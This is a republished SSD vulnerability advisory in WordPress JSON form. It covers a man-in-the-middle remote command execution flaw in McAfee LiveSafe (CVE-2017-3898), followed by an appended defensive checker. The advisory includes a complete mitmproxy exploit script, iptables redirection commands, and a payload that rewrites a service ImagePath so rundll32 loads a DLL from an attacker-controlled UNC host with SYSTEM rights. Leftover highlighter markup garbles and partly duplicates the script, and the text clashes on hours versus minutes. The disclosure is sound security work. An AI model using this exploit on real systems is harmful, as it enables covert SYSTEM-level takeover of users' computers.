{"id":10483,"date":"2017-11-14T14:19:21","date_gmt":"2017-11-14T22:19:21","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/11\/14\/news-4255\/"},"modified":"2017-11-14T14:19:21","modified_gmt":"2017-11-14T22:19:21","slug":"news-4255","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/11\/14\/news-4255\/","title":{"rendered":"SSD Advisory - McAfee LiveSafe MiTM Registry Modification Leading to Remote Command Execution Vulnerability"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz | Date: Tue, 14 Nov 2017 12:11:39 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:ssd@beyondsecurity.com\">ssd@beyondsecurity.com<\/a><br \/> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes a remote command execution vulnerability in McAfee LiveSafe (MLS) that affects all versions of McAfee LiveSafe (MLS) prior to 16.0.3. 
The vulnerability allows a network attacker to tamper with the HTTP backend response and thereby modify Windows registry values related to McAfee updates.<\/p>\n<p>McAfee Security Scan Plus is a free diagnostic tool that proactively checks the computer for the latest anti-virus, firewall and web security software updates to keep users protected from threats, and also scans running programs for threats.<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security research company, Silent Signal, reported this vulnerability to Beyond Security's SSD.<\/p>\n<p><strong>Vendor Response<\/strong><br \/> The vendor has released a patch for this vulnerability. For more information: https:\/\/service.mcafee.com\/webcenter\/portal\/cp\/home\/articleview?articleId=TS102714<br \/> CVE: CVE-2017-3898<\/p>\n<p><strong>Vulnerability Details<\/strong><br \/> A network attacker can achieve remote code execution in several McAfee products. The affected products retrieve configuration data over a plaintext HTTP channel from http:\/\/COUNTRY.mcafee.com\/apps\/msc\/webupdates\/mscconfig.asp (where \"COUNTRY\" is replaced by the two-letter country identifier, e.g. \"uk\").<\/p>\n<p>The response body contains XML data similar to the following:<\/p>\n<pre><code>&lt;webservice-response response-version=\"1.0\" frequency=\"168\" verid=\"1#1316#15#0#2\"&gt;\n  &lt;update&gt;\n    &lt;reg 
key=\"HKLM\\SOFTWARE\\McAfee\\MSC\\Settings\\InProductTransaction\" name=\"enable\" type=\"REG_DWORD\" value=\"1\" obfuscate=\"0\"\/&gt;\n  &lt;\/update&gt;\n&lt;\/webservice-response&gt;<\/code><\/pre>\n<p>The above response describes a registry modification performed with a reg tag under the webservice-response\/update path.<\/p>\n<p>This request and the subsequent updates are triggered automatically: first after the software is installed, then after the number of hours specified by the frequency attribute of the webservice-request node (168 minutes by default).<\/p>\n<p>The registry modification is carried out by the McSvHost.exe process, which runs with SYSTEM privileges inherited from the mcsvrcnt.exe process.<\/p>\n<p>The target's registry is written with SYSTEM privileges.<\/p>\n<p><strong>Proof of Concept<\/strong><br \/> An attacker can exploit this vulnerability by acting as a proxy to intercept and modify plaintext HTTP requests and responses. Since the target software performs certificate validation for HTTPS services, it is very important to let those connections pass through unmodified.<\/p>\n<p>In regular HTTP 
proxy mode this can be achieved with mitmproxy's --ignore command-line parameter:<\/p>\n<pre><code>mitmproxy -s mcreggeli_inline.py --ignore '.*'<\/code><\/pre>\n<p>In transparent proxy mode, the above parameter should not be supplied:<\/p>\n<pre><code>mitmproxy -s mcreggeli_inline.py -T<\/code><\/pre>\n<p>For transparent proxy mode, NAT and port redirection can be configured on a Debian-based Linux distribution with the following commands (eth0 is the interface visible to the target, eth1 is connected to the network):<\/p>\n<pre><code>iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to 8080\niptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE\nsysctl net.ipv4.ip_forward=1<\/code><\/pre>\n<p>The script looks for the string \"mscconfig.asp\" in the requested URL. If it is found, the XML response body is deserialized and new reg nodes are added according to the REG variable declared at the beginning of the script. REG is a list of dictionaries, each containing the following keys:<\/p>\n<ul>\n<li>Key - the name of the registry key to modify (e.g. 
\"HKLM\\SYSTEM\\CurrentControlSet\\Services\\mfevtp\"; backslashes must be escaped correctly in Python)<\/li>\n<li>Type - the type of the value to create (e.g. \"REG_SZ\" for a string)<\/li>\n<li>Name - the name of the value to create<\/li>\n<li>Value - the value to create<\/li>\n<\/ul>\n<p>The exploit also changes the frequency attribute to 1, so that the vulnerability can be exploited again within a shorter time (within 1 hour). After the new nodes have been inserted, the resulting object is serialized and put in place of the original response body.<\/p>\n<p>To demonstrate code execution, we overwrote a service entry of the affected McAfee product (mfevtp - McAfee Process Validation Service): the ImagePath value of the HKLM\\SYSTEM\\CurrentControlSet\\Services\\mfevtp key was replaced with a rundll32.exe command whose argument is a UNC path pointing to the attacker's host (during testing we used the payload test.dll provided by Metasploit's smb_delivery module):<\/p>\n<p><a 
href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/McAfee-300x56.jpg\"><img src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/McAfee-300x56-300x56.jpg\" alt=\"\" width=\"300\" height=\"56\" class=\"alignnone size-medium wp-image-3523\" \/><\/a><\/p>\n<p>The REG variable is declared as follows:<\/p>\n<pre><code>REG=[{\"key\":r\"HKLM\\SYSTEM\\CurrentControlSet\\Services\\mfevtp\", \"type\":\"REG_SZ\",\"name\":\"ImagePath\", \"value\":r\"c:\\windows\\system32\\rundll32.exe \\\\172.16.205.1\\pwn\\test.dll,0\"},]<\/code><\/pre>\n<p>In this way, SYSTEM-level command execution is triggered once the computer is restarted, and the McAfee software does not catch the exploitation.<\/p>\n<p><u>mcreggeli_inline.py<\/u><\/p>\n<pre><code>#!\/usr\/bin\/env python3\n#\n# HTTP proxy mode:\n#  mitmproxy -s mcreggeli_inline.py --ignore '.*'\n#\n# Transparent proxy mode:\n#   mitmproxy -s mcreggeli_inline.py -T --host\n#\n\nfrom mitmproxy import ctx, http\nfrom lxml import etree\n\n# Raw strings: the backslashes in the registry key and in the UNC path must not be read as escape sequences\nREG=[{\"key\":r\"HKLM\\SYSTEM\\CurrentControlSet\\Services\\mfevtp\",\"type\":\"REG_SZ\",\"name\":\"ImagePath\",\"value\":r\"c:\\windows\\system32\\rundll32.exe \\\\172.16.205.1\\pwn\\test.dll,0\"},]\n\ndef response(flow):\n    # Only plaintext HTTP responses for the mscconfig.asp configuration URL are modified; HTTPS flows pass through untouched\n    if flow.request.scheme == \"http\" and \"mscconfig.asp\" in flow.request.url:\n        try:\n            oxml=etree.XML(flow.response.content)\n            oxml.set(\"frequency\",\"1\")\n            update=oxml.xpath(\"\/\/webservice-response\/update\")[0]\n            for r in REG:\n                reg=etree.SubElement(update,\"reg\")\n                reg.set(\"key\", r[\"key\"])\n                reg.set(\"type\", r[\"type\"])\n                reg.set(\"obfuscate\", \"0\")\n                reg.set(\"name\", r[\"name\"])\n                reg.set(\"value\", r[\"value\"])\n            #ctx.log(etree.tostring(oxml))\n            flow.response.content=etree.tostring(oxml)\n            ctx.log(\"[+] [MCREGGELI] Payload sent\")\n        except etree.XMLSyntaxError:\n            ctx.log(\"[-] [MCREGGELI] XML deserialization error\")<\/code><\/pre>\n
id=\"crayon-5a0b6be8ca1fe711570589-15\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">response<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6be8ca1fe711570589-16\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">scheme<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;http&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;mscconfig.asp&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">request<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6be8ca1fe711570589-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6be8ca1fe711570589-18\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">oxml<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">etree<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">XML<\/span><span 
class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">response<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6be8ca1fe711570589-19\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">oxml<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">set<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;frequency&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;1&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6be8ca1fe711570589-20\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">update<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">oxml<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">xpath<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;\/\/webservice-response\/update&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6be8ca1fe711570589-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">REG<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6be8ca1fe711570589-22\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">reg<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">etree<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">SubElement<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">update<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;reg&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6be8ca1fe711570589-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">reg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">set<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;key&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8220;key&#8221;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6be8ca1fe711570589-24\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">reg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">set<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;type&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8220;type&#8221;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6be8ca1fe711570589-25\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">reg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">set<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;obfuscate&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;0&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6be8ca1fe711570589-26\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">reg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">set<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;name&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8220;name&#8221;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6be8ca1fe711570589-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">reg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">set<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;value&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8220;value&#8221;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6be8ca1fe711570589-28\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\">#ctx.log(etree.tostring(oxml)) <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6be8ca1fe711570589-29\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">flow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">response<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">etree<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">tostring<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">oxml<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6be8ca1fe711570589-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ctx<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">log<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;[+] [MCREGGELI] Payload sent&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a0b6be8ca1fe711570589-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">except <\/span><span class=\"crayon-v\">etree<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">XMLSyntaxError<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a0b6be8ca1fe711570589-32\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">ctx<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">log<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;[-] [MCREGGELI] XML 
deserialization error&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0030 seconds] -->  <\/p>\n<p><\/test><\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3522\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/McAfee-300x56-300x56.jpg\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Tue, 14 Nov 2017 12:11:39 +0000<\/strong><\/p>\n<p>\u6f0f\u6d1e\u6982\u8981 \u4ee5\u4e0b\u5b89\u5168\u516c\u544a\u63cf\u8ff0\u4e86\u5728 McAfee LiveSafe (MLS) \u4e2d\u5b58\u5728\u7684\u4e00\u4e2a\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\uff0c\u8be5\u6f0f\u6d1e\u5f71\u54cd\u4e86McAfee LiveSafe\uff08MLS\uff0916.0.3 \u4e4b\u524d\u5168\u90e8\u7248\u672c. \u4e4b\u524d\u5168\u90e8\u7248\u672c. \u6f0f\u6d1e\u5141\u8bb8\u7f51\u7edc\u653b\u51fb\u8005\u901a\u8fc7\u7be1\u6539 HTTP \u540e\u7aef\u54cd\u5e94, \u8fdb\u800c\u4fee\u6539\u4e0e McAfee \u66f4\u65b0\u76f8\u5173\u7684 Windows \u6ce8\u518c\u8868\u503c. 
McAfee Security Scan Plus is a free diagnostic tool that keeps users protected by actively checking the computer for current anti-virus, firewall and web security software updates, and also scans running programs for threats. Vulnerability Reporter: Silent Signal, an independent security research company, reported the vulnerability to Beyond Security&#8217;s SSD. Vendor Response: The vendor has released a patch for this vulnerability. For more information: https:\/\/service.mcafee.com\/webcenter\/portal\/cp\/home\/articleview?articleId=TS102714 CVE: CVE-2017-3898 Vulnerability Details: A network attacker can achieve remote code execution in several McAfee products. Affected products retrieve configuration data over a plaintext HTTP channel from http:\/\/COUNTRY.mcafee.com\/apps\/msc\/webupdates\/mscconfig.asp (where &#8220;COUNTRY&#8221; is replaced by the two-letter country identifier, e.g. &#8220;uk&#8221;). The response body contains XML data; the sample in the advisory shows registry modifications being driven by reg tags under the webservice-response\/update path. &#8230;<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[15774,12270,11682,10757,12136],"class_list":["post-10483","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-chinese-translation","tag-man-in-the-middle","tag-remote-code-execution","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10483","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=10483"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10483\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=10483"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=10483"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=10483"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
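Worked example, added for this page and not part of the SSD advisory or of Silent Signal's mitmproxy script: a Python checker that parses an mscconfig.asp-style response and flags reg directives capable of turning a configuration update into code execution, which is exactly what the injected mfevtp ImagePath entry in the script above does. The response shape (a webservice-response root with a frequency attribute and an update child holding reg elements with key, type, obfuscate, name and value attributes) follows what the script manipulates; the XML declaration, the benign LastCheck entry under HKLM\SOFTWARE\McAfee\MSC, the rule set and the function names are constructed for this example. The rules are a heuristic for reviewing captured traffic or raising a proxy-side alert; the defect the advisory describes is that the client trusts configuration fetched over plaintext HTTP, and no content heuristic substitutes for the vendor patch.

```python
# Added example for this page: a checker for mscconfig.asp-style responses
# that flags <reg> directives able to turn a configuration update into code
# execution. Not part of the SSD advisory or of Silent Signal's script.
import re
import xml.etree.ElementTree as ET

# Constructed sample shaped like the response the proxy script rewrites:
# a <webservice-response> root carrying a frequency attribute and an <update>
# child holding <reg> entries with key/type/obfuscate/name/value attributes.
# The first entry is a harmless-looking value invented for this example;
# the second is the entry the script injects. Raw bytes keep the backslashes.
SAMPLE_RESPONSE = rb"""<?xml version="1.0" encoding="utf-8"?>
<webservice-response frequency="1">
  <update>
    <reg key="HKLM\SOFTWARE\McAfee\MSC" type="REG_SZ" obfuscate="0" name="LastCheck" value="20171114"/>
    <reg key="HKLM\SYSTEM\CurrentControlSet\Services\mfevtp" type="REG_SZ" obfuscate="0" name="ImagePath" value="c:\windows\system32\rundll32.exe \\172.16.205.1\pwn\test.dll,0"/>
  </update>
</webservice-response>
"""

# Keys under which a REG_SZ write changes what the Service Control Manager runs.
SERVICE_KEY_RE = re.compile(
    r"^HKLM\\SYSTEM\\(CurrentControlSet|ControlSet\d{3})\\Services\\", re.I
)
# A UNC path (\\host\share\...) in a value means code is fetched from the network.
UNC_RE = re.compile(r"\\\\[^\\\s]+\\[^\\\s]+")
# Native binaries commonly used to run attacker-supplied code from a path.
LOADERS = ("rundll32", "regsvr32", "mshta", "wscript", "cscript", "powershell", "cmd.exe")


def find_dangerous_reg_entries(xml_bytes):
    """Return one dict per <reg> entry that looks like a code-execution primitive.

    Each dict holds the entry's key, name and value plus the reasons it was
    flagged. Entries that trip no rule are not returned.
    """
    root = ET.fromstring(xml_bytes)
    findings = []
    for reg in root.findall("update/reg"):
        key = reg.get("key", "")
        name = reg.get("name", "")
        value = reg.get("value", "")
        reasons = []
        if SERVICE_KEY_RE.match(key):
            reasons.append("writes under a service configuration key")
        if name.lower() == "imagepath":
            reasons.append("rewrites a service ImagePath")
        if UNC_RE.search(value):
            reasons.append("value references a UNC path")
        if any(loader in value.lower() for loader in LOADERS):
            reasons.append("value invokes a native loader binary")
        if reasons:
            findings.append({"key": key, "name": name, "value": value, "reasons": reasons})
    return findings


def is_safe_config(xml_bytes):
    """True when no <reg> entry in the response trips any rule."""
    return not find_dangerous_reg_entries(xml_bytes)


if __name__ == "__main__":
    for finding in find_dangerous_reg_entries(SAMPLE_RESPONSE):
        print(finding["key"], finding["name"], "->", "; ".join(finding["reasons"]))
```

Run directly, it prints the one flagged entry with all four reasons. Inside a mitmproxy response hook like the one above, the same function can be applied to flow.response.content for URLs containing mscconfig.asp to alert when a tampered configuration reaches a monitored host; xml.etree is used here because it is in the standard library, and for genuinely untrusted input a hardened parser such as defusedxml is the safer choice.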